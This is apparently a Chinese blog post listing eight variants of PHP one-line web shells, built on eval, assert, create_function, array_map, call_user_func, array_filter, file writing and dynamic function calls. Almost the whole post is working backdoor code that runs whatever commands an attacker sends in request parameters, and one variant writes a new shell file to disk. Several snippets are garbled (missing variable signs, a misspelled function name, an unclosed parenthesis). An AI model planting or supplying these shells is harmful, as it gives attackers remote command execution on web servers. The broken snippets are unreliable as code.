PHP 8种一句话木马
一句话木马书写:为什么是一句话木马,因为他可以通过函数接收指定的参数来让我们的操作系统执行指定的命令
1.eval函数
<?php eval($_REQUEST['a']);?>
2.assert函数(php官方在php7中更改了assert函数。在php7.0.29之后的版本不支持动态调用。也就是7.0.29之后无法执行命令)
<?php assert($_REQUEST["a"]); ?>
3.匿名方法构造
<?php func=create_function('',$_POST['a']); func();?>
4.array_map的书写方式:
1 2 3 4 5 | <?php $func = $_POST [ 'a' ]; $arr = array ( $_POST [ 'b' ]); news = array_map ( $func , $arr ); ?> |
5.call_user_func(方法名,参数) 把接受的第一个值当作回调函数调用,其余参数作为回调函数的参数
<?php $a = $_GET['a']; call_user_func(assert,$a); //书写为一句 //call_user_func(assert,$_GET['a']);
?>
6.array_filert(方法名,数组)
<?php //函数过滤器,学过python的小伙伴一定看的懂,就是将数组中的每个值放到指定的函数中,返回一个只含有true的结果,上方的array_map也和python的map函数基本相像 $arr = array_filert($_GET['func'],array($_GET['a'])); ?>
7.文件操作函数:生成一个之前的一句话木马,
<?php $test='<?php eval($_POST['a']);?>'; file_put_contents('test1.php',$test);
//一句话的书写方式
fputs(fopen('a.php','w'),'<?php assert($_POST["a"]?>'); ?>
8.动态函数调用:接收一个函数作为函数名,一个函数作为参数进行动态调用
<? $_GET['func']($_GET['a']); ?>
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效